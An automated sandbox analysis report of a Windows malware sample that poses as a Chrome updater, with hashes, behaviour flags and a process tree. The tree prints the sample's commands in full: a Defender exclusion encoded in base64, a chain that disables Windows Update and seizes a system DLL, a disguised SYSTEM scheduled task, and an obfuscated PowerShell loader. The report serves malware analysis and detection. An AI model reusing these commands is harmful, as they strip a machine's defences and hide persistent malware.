Analysis

  • max time kernel
    106s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2022 19:52

General

  • Target

    16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

  • Size

    2.6MB

  • MD5

    c0827a7bd617a2fcd31a3d751152c2e0

  • SHA1

    2d58f48e54e1c54e7b63e7ba2c9f50323994242a

  • SHA256

    16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

  • SHA512

    cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5

  • SSDEEP

    49152:Y00kMwfXeTG2JpMpukZ6obih7GQtMKc+l3s7RjE+SsZa:YJkduTG2JQdZ6nhYK1cu3

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:480
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:464
      • C:\Windows\system32\winlogon.exe
        winlogon.exe
        1⤵
          PID:420
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{484ec1d7-7d07-4eee-99e9-e6085977c41c}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:868
          • C:\Windows\SysWOW64\dllhost.exe
            C:\Windows\SysWOW64\dllhost.exe /Processid:{3ad4bb9b-2eae-4d4b-92a6-4b886475773d}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1820
        • C:\Windows\system32\lsm.exe
          C:\Windows\system32\lsm.exe
          1⤵
            PID:488
          • C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
            "C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
            1⤵
            • Drops file in Drivers directory
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
              2⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1856
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1980
              • C:\Windows\system32\sc.exe
                sc stop UsoSvc
                3⤵
                • Launches sc.exe
                PID:1212
              • C:\Windows\system32\sc.exe
                sc stop WaaSMedicSvc
                3⤵
                • Launches sc.exe
                PID:980
              • C:\Windows\system32\sc.exe
                sc stop wuauserv
                3⤵
                • Launches sc.exe
                PID:832
              • C:\Windows\system32\sc.exe
                sc stop bits
                3⤵
                • Launches sc.exe
                PID:1436
              • C:\Windows\system32\sc.exe
                sc stop dosvc
                3⤵
                • Launches sc.exe
                PID:1004
              • C:\Windows\system32\reg.exe
                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                3⤵
                • Modifies registry key
                PID:1228
              • C:\Windows\system32\reg.exe
                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                3⤵
                • Modifies registry key
                PID:1968
              • C:\Windows\system32\reg.exe
                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                3⤵
                • Modifies security service
                • Modifies registry key
                PID:1760
              • C:\Windows\system32\reg.exe
                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                3⤵
                • Modifies registry key
                PID:576
              • C:\Windows\system32\reg.exe
                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                3⤵
                • Modifies registry key
                PID:1084
              • C:\Windows\system32\takeown.exe
                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:1292
              • C:\Windows\system32\icacls.exe
                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:1452
              • C:\Windows\system32\reg.exe
                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                3⤵
                • Modifies registry key
                PID:1860
              • C:\Windows\system32\reg.exe
                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                3⤵
                • Modifies registry key
                PID:472
              • C:\Windows\system32\reg.exe
                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                3⤵
                • Modifies registry key
                PID:764
              • C:\Windows\system32\reg.exe
                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                3⤵
                • Modifies registry key
                PID:332
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                3⤵
                  PID:1388
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                  3⤵
                    PID:1612
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                    3⤵
                      PID:1820
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                      3⤵
                        PID:1588
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                        3⤵
                          PID:1592
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                          3⤵
                            PID:1092
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            3⤵
                              PID:900
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1992
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:300
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -hibernate-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1536
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1912
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:588
                          • C:\Windows\System32\conhost.exe
                            C:\Windows\System32\conhost.exe
                            2⤵
                            • Drops file in Windows directory
                            PID:1864
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                            2⤵
                              PID:300
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                                3⤵
                                • Creates scheduled task(s)
                                PID:1364
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              2⤵
                                PID:1628
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  3⤵
                                    PID:576
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
                                  2⤵
                                  • Deletes itself
                                  PID:1908
                                  • C:\Windows\system32\choice.exe
                                    choice /C Y /N /D Y /T 3
                                    3⤵
                                      PID:1764
                                • C:\Windows\system32\taskeng.exe
                                  taskeng.exe {B44F926E-3FBD-4BEB-8A47-F879209878AD} S-1-5-18:NT AUTHORITY\System:Service:
                                  1⤵
                                  • Loads dropped DLL
                                  PID:1096
                                  • C:\Program Files\Google\Chrome\updater.exe
                                    "C:\Program Files\Google\Chrome\updater.exe"
                                    2⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1168
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
                                      3⤵
                                      • Drops file in System32 directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1920
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                      3⤵
                                        PID:1572
                                        • C:\Windows\system32\sc.exe
                                          sc stop UsoSvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:1716
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:1808
                                        • C:\Windows\system32\sc.exe
                                          sc stop wuauserv
                                          4⤵
                                          • Launches sc.exe
                                          PID:1860
                                        • C:\Windows\system32\sc.exe
                                          sc stop bits
                                          4⤵
                                          • Launches sc.exe
                                          PID:1040
                                        • C:\Windows\system32\sc.exe
                                          sc stop dosvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:1088
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                          4⤵
                                          • Modifies registry key
                                          PID:536
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                          4⤵
                                          • Modifies registry key
                                          PID:1228
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                          4⤵
                                          • Modifies registry key
                                          PID:1748
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                          4⤵
                                          • Modifies registry key
                                          PID:964
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        3⤵
                                          PID:952
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-ac 0
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1952
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-dc 0
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1216
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -standby-timeout-ac 0
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1372
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -standby-timeout-dc 0
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1464
                                        • C:\Windows\System32\dialer.exe
                                          C:\Windows\System32\dialer.exe "fotenqffsdg"
                                          3⤵
                                            PID:1536
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                          2⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Drops file in System32 directory
                                          • Suspicious use of SetThreadContext
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:472
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                          2⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Drops file in System32 directory
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1812

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Execution

                                      Scheduled Task

                                      1
                                      T1053

                                      Persistence

                                      Modify Existing Service

                                      2
                                      T1031

                                      Scheduled Task

                                      1
                                      T1053

                                      Privilege Escalation

                                      Scheduled Task

                                      1
                                      T1053

                                      Defense Evasion

                                      Modify Registry

                                      3
                                      T1112

                                      Impair Defenses

                                      1
                                      T1562

                                      File Permissions Modification

                                      1
                                      T1222

                                      Install Root Certificate

                                      1
                                      T1130

                                      Discovery

                                      System Information Discovery

                                      1
                                      T1082

                                      Command and Control

                                      Web Service

                                      1
                                      T1102

                                      Impact

                                      Service Stop

                                      1
                                      T1489

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Program Files\Google\Chrome\updater.exe
                                        Filesize

                                        2.6MB

                                        MD5

                                        c0827a7bd617a2fcd31a3d751152c2e0

                                        SHA1

                                        2d58f48e54e1c54e7b63e7ba2c9f50323994242a

                                        SHA256

                                        16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

                                        SHA512

                                        cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5

                                      • C:\Program Files\Google\Chrome\updater.exe
                                        Filesize

                                        2.6MB

                                        MD5

                                        c0827a7bd617a2fcd31a3d751152c2e0

                                        SHA1

                                        2d58f48e54e1c54e7b63e7ba2c9f50323994242a

                                        SHA256

                                        16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

                                        SHA512

                                        cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5

                                      • C:\Windows\system32\drivers\etc\hosts
                                        Filesize

                                        860B

                                        MD5

                                        63b960c8d33c756293dfca7f8a2c50f3

                                        SHA1

                                        958b4e2fc745072879c19de73620b84a8500a190

                                        SHA256

                                        2f513fa3cf9778985ed1f58d33cc575723825ec57ed91dae1e9aa340b2721969

                                        SHA512

                                        799747ff0038f8b2d87bead690b2101ca7fa92f84186ece14c0f1d362ece9d89ca7898e390136eb888cc4f052ad21e5c9a78d67d27b76e13740f964d4eebe536

                                      • \Program Files\Google\Chrome\updater.exe
                                        Filesize

                                        2.6MB

                                        MD5

                                        c0827a7bd617a2fcd31a3d751152c2e0

                                        SHA1

                                        2d58f48e54e1c54e7b63e7ba2c9f50323994242a

                                        SHA256

                                        16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

                                        SHA512

                                        cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5

                                      • memory/284-298-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/284-295-0x0000000001300000-0x000000000132A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/300-69-0x0000000000000000-mapping.dmp
                                      • memory/300-111-0x0000000000000000-mapping.dmp
                                      • memory/332-86-0x0000000000000000-mapping.dmp
                                      • memory/420-163-0x00000000007D0000-0x00000000007FA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/420-155-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/420-162-0x00000000007A0000-0x00000000007C3000-memory.dmp
                                        Filesize

                                        140KB

                                      • memory/420-152-0x000007FEBE0D0000-0x000007FEBE0E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/420-149-0x00000000007A0000-0x00000000007C3000-memory.dmp
                                        Filesize

                                        140KB

                                      • memory/420-212-0x00000000007D0000-0x00000000007FA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/464-213-0x0000000000160000-0x000000000018A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/464-164-0x0000000000160000-0x000000000018A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/464-158-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/464-157-0x000007FEBE0D0000-0x000007FEBE0E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/472-84-0x0000000000000000-mapping.dmp
                                      • memory/472-173-0x0000000003760000-0x000000000377B000-memory.dmp
                                        Filesize

                                        108KB

                                      • memory/472-135-0x0000000073BC0000-0x000000007416B000-memory.dmp
                                        Filesize

                                        5.7MB

                                      • memory/472-177-0x0000000073BC0000-0x000000007416B000-memory.dmp
                                        Filesize

                                        5.7MB

                                      • memory/472-178-0x0000000077160000-0x00000000772E0000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/472-126-0x0000000074D61000-0x0000000074D63000-memory.dmp
                                        Filesize

                                        8KB

                                      • memory/472-179-0x0000000003760000-0x0000000003765000-memory.dmp
                                        Filesize

                                        20KB

                                      • memory/472-180-0x0000000003780000-0x00000000037A1000-memory.dmp
                                        Filesize

                                        132KB

                                      • memory/472-124-0x0000000000000000-mapping.dmp
                                      • memory/480-277-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/480-203-0x00000000000D0000-0x00000000000FA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/480-202-0x000007FEBE0D0000-0x000007FEBE0E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/488-210-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/488-278-0x0000000000460000-0x000000000048A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/488-209-0x000007FEBE0D0000-0x000007FEBE0E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/536-199-0x0000000000000000-mapping.dmp
                                      • memory/576-116-0x0000000000000000-mapping.dmp
                                      • memory/576-79-0x0000000000000000-mapping.dmp
                                      • memory/588-78-0x0000000000000000-mapping.dmp
                                      • memory/596-292-0x0000000000140000-0x000000000016A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/596-303-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/672-302-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/672-293-0x0000000000400000-0x000000000042A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/756-279-0x00000000008C0000-0x00000000008EA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/764-85-0x0000000000000000-mapping.dmp
                                      • memory/804-280-0x0000000000940000-0x000000000096A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/832-70-0x0000000000000000-mapping.dmp
                                      • memory/844-281-0x00000000009A0000-0x00000000009CA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/868-148-0x0000000076E60000-0x0000000076F7F000-memory.dmp
                                        Filesize

                                        1.1MB

                                      • memory/868-161-0x0000000076F80000-0x0000000077129000-memory.dmp
                                        Filesize

                                        1.7MB

                                      • memory/868-154-0x0000000140000000-0x0000000140042000-memory.dmp
                                        Filesize

                                        264KB

                                      • memory/868-289-0x00000000003E0000-0x000000000040A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/868-139-0x00000001400033F4-mapping.dmp
                                      • memory/868-146-0x0000000076F80000-0x0000000077129000-memory.dmp
                                        Filesize

                                        1.7MB

                                      • memory/868-143-0x0000000140000000-0x0000000140042000-memory.dmp
                                        Filesize

                                        264KB

                                      • memory/868-138-0x0000000140000000-0x0000000140042000-memory.dmp
                                        Filesize

                                        264KB

                                      • memory/876-300-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/876-294-0x0000000000A10000-0x0000000000A3A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/900-93-0x0000000000000000-mapping.dmp
                                      • memory/952-188-0x0000000000000000-mapping.dmp
                                      • memory/980-68-0x0000000000000000-mapping.dmp
                                      • memory/992-282-0x0000000001BB0000-0x0000000001BDA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1004-73-0x0000000000000000-mapping.dmp
                                      • memory/1040-196-0x0000000000000000-mapping.dmp
                                      • memory/1056-283-0x00000000001E0000-0x000000000020A000-memory.dmp
                                        Filesize

                                        168KB

